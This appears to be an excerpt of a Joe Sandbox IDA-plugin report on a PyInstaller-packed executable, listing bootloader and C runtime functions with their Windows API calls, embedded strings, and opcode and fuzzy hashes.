Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: 4e080111de20cb8cc14282bb86548159ce5a5871706699cf3ae79cd0dae52d9d
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: 21418031A28A8691FA21EF30E6552FE6325FF54344F80413BEA5C83699EF3CE529C740

Function 00007FF6D9232A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6D923351A,?,00000000,00007FF6D9233F23), ref: 00007FF6D9232AA0

Strings

[PYI-%d:%s] , xrefs: 00007FF6D9232AA8
Warning, xrefs: 00007FF6D9232B1E
Warning [ANSI Fallback], xrefs: 00007FF6D9232B0F
WARNING, xrefs: 00007FF6D9232AAF
0, xrefs: 00007FF6D9232B16

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: ebdadc2a4ad1f5b20c0eab10e96bc76c9315f5c28461567071501da916fb4e9e
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 21218132A29B8192F760DF61B9817EA63A4FB88784F400137EE8D93659DF3CD2558740

Function 00007FF6D924B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D924B15F
FlsGetValue.KERNEL32 ref: 00007FF6D924B174
FlsSetValue.KERNEL32 ref: 00007FF6D924B195
FlsSetValue.KERNEL32 ref: 00007FF6D924B1C2
FlsSetValue.KERNEL32 ref: 00007FF6D924B1D3
FlsSetValue.KERNEL32 ref: 00007FF6D924B1E4
SetLastError.KERNEL32 ref: 00007FF6D924B1FF

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: 444c513c6b3a8cfecd228b92b2f2a70ecf025ab65f8287a22c1a5ca44aad9dda
Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: CD216220F2D24241FB545F215B5517D52525FACBB0F044736D93EC7ACADD2CB4318B00

Function 00007FF6D9257D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6D9257D9D
GetLastError.KERNEL32 ref: 00007FF6D9257DA9
CloseHandle.KERNEL32 ref: 00007FF6D9257DC1
CreateFileW.KERNEL32 ref: 00007FF6D9257DEC
WriteConsoleW.KERNEL32 ref: 00007FF6D9257E0B

Strings

CONOUT$, xrefs: 00007FF6D9257DCD

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: 67ae893da6cff7c096ddb8f56d3787e587dd4d5aeb2034e4daa4ed72ec1c5751
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 72114F21A28A4186F7908F52B95533D63A4BB88BE4F144235EA5DC7B98DF7CD864C740

Function 00007FF6D9238ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9233FB1), ref: 00007FF6D9238EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9233FB1), ref: 00007FF6D9238F5A

Part of subcall function 00007FF6D9239390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92345F4,00000000,00007FF6D9231985), ref: 00007FF6D92393C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9233FB1), ref: 00007FF6D9238FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9233FB1), ref: 00007FF6D9239044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9233FB1), ref: 00007FF6D9239055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6D9233FB1), ref: 00007FF6D923906A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction ID: b853098dc87c53212bc72bcf198ff554982001b905de4886a59debfafcdefdce
Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction Fuzzy Hash: A341B566A2A68281FA709F21A6002BE73A4FB85BD4F44413ADF8D97789DE3CD521C700

Function 00007FF6D924B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A,?,?,?,?,00007FF6D924718F), ref: 00007FF6D924B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A,?,?,?,?,00007FF6D924718F), ref: 00007FF6D924B30D
FlsSetValue.KERNEL32(?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A,?,?,?,?,00007FF6D924718F), ref: 00007FF6D924B33A
FlsSetValue.KERNEL32(?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A,?,?,?,?,00007FF6D924718F), ref: 00007FF6D924B34B
FlsSetValue.KERNEL32(?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A,?,?,?,?,00007FF6D924718F), ref: 00007FF6D924B35C
SetLastError.KERNEL32(?,?,?,00007FF6D9244F11,?,?,?,?,00007FF6D924A48A,?,?,?,?,00007FF6D924718F), ref: 00007FF6D924B377

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 5f9cb57131ea5b69c8bc88216117fd07819e5adfd84c44781af76d62dfb75a45
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: 88116020F2D65282FA545F225B9117D16429FACBB0F044737D93EC7ADADE2CA8318F00

Function 00007FF6D9232910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9231B6A), ref: 00007FF6D923295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF6D9232966
%s: %s, xrefs: 00007FF6D92329E8
Error, xrefs: 00007FF6D9232A0E
Error [ANSI Fallback], xrefs: 00007FF6D92329FF

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 498239b6f7241faf9516f93273b39543a4af591935f41bfaf7796a27b56ee49c
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: C031F422B2968152F720EF65AA416FE6294BF887D4F400137EE8DC3749EF3CD166C600

Function 00007FF6D9232390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6D92323C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6D923248E
DeleteObject.GDI32 ref: 00007FF6D92324C1
DestroyIcon.USER32 ref: 00007FF6D92324D3

Strings

Unhandled exception in script, xrefs: 00007FF6D92323F8

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: e93994124e15cb9a060279489a45b358b8cddb7c5909ba202a497b5d4e37e115
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: BE314E72629A8289FB60DF61E9552FD6360FF88788F440136EA4D87B59DF3CD1158700

Function 00007FF6D9232B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6D923918F,?,00007FF6D9233C55), ref: 00007FF6D9232BA0
MessageBoxW.USER32 ref: 00007FF6D9232C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF6D9232BA8
Warning, xrefs: 00007FF6D9232C1D
WARNING, xrefs: 00007FF6D9232BAF

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 93ac91ed0e93c36cb4be8a7f340f6d458d225d6adbf0e4890f0090f07168e04b
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: E121DE62B29B4182F720DF24F9407AE63A4EB88780F400136EE8D93659EE3CD225C740

Function 00007FF6D9232710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6D9231B99), ref: 00007FF6D9232760

Strings

[PYI-%d:%s] , xrefs: 00007FF6D9232768
ERROR, xrefs: 00007FF6D923276F
Error, xrefs: 00007FF6D92327DE
Error [ANSI Fallback], xrefs: 00007FF6D92327CF

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 065f64df56d8eb07a3280a1fdb7dc2d46f2a42c014d743d69d1e991f36481558
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 83218132A29B8192F760DF61B9817EA63A4FF88784F400136EE8D93659DF7CD1558B40

Function 00007FF6D9249A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6D9249AAD
GetProcAddress.KERNEL32 ref: 00007FF6D9249AC3
FreeLibrary.KERNEL32 ref: 00007FF6D9249AEA

Strings

CorExitProcess, xrefs: 00007FF6D9249ABC
mscoree.dll, xrefs: 00007FF6D9249AA4

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: c516cbf26555efffdc05eb61694c7f7fd44b7f12a29fb35f5bf398e427f260c8
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 05F04F25A2960681FE548F24A95477E6320AF49BA1F540237D66EC65E8DF2CD498C740

Function 00007FF6D9259368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6D9259390
_set_statfp.LIBCMT ref: 00007FF6D92593AB
_set_statfp.LIBCMT ref: 00007FF6D92593C7
_set_statfp.LIBCMT ref: 00007FF6D9259403

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: e441b1b7d87f6481dcc910a47fcdd38c9ce11b2d6b89f32a2ec047774c872c0d
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 3311943EE7CA0391FAE42969E79137D1170AF59370E840636FA6ED62DECE6C68614110

Function 00007FF6D924B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6D924A5A3,?,?,00000000,00007FF6D924A83E,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF6D924A5A3,?,?,00000000,00007FF6D924A83E,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF6D924A5A3,?,?,00000000,00007FF6D924A83E,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF6D924A5A3,?,?,00000000,00007FF6D924A83E,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924B407
FlsSetValue.KERNEL32(?,?,?,00007FF6D924A5A3,?,?,00000000,00007FF6D924A83E,?,?,?,?,?,00007FF6D924A7CA), ref: 00007FF6D924B418

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: cd1c52aff6b223eaa069df082054aae4aa76339d73bf136b8b54ddd76c22c4e0
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: 7D115120F2D64241FA589F25AB9117D21515FA87B0F485337E93EC6ADADE2CF8728F40

Function 00007FF6D924B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6D924B235
FlsSetValue.KERNEL32 ref: 00007FF6D924B254
FlsSetValue.KERNEL32 ref: 00007FF6D924B27C
FlsSetValue.KERNEL32 ref: 00007FF6D924B28D
FlsSetValue.KERNEL32 ref: 00007FF6D924B29E

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: c9905cf2f3390db8b904828deab912cf19c591e919d01bad0d31777e8cb85129
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: 1C112720F2D20741FA68AF716B511BE11424FAD730F085736D93ECA6C6DD2CB8719B41

Function 00007FF6D9245FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9245FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9246106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92461BC

Strings

verbose, xrefs: 00007FF6D9245FB0

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 950160970373afb41ddbbed038b9df5b54f55464324eba981557b87fdb40e573
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 6591F432A28A4681F7618E24D65037F37A1AB68B94F844133DA5EC73D6DF3CE8258B01

Function 00007FF6D924FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924FEA7

Part of subcall function 00007FF6D9247A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9247A59

Strings

ccs, xrefs: 00007FF6D924FDE2
UTF-16LEUNICODE, xrefs: 00007FF6D924FE45
UTF-8, xrefs: 00007FF6D924FE26

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 1ffbec0782ef227fc8b2ff8540ef20b7d495f87e2944c9a5488d2c694815ab32
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: A781B272F28242C5F764AE25D7802BC26A0ABBDB44F554037CA09D7689CF2DE9219F01

Function 00007FF6D923D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D923D673
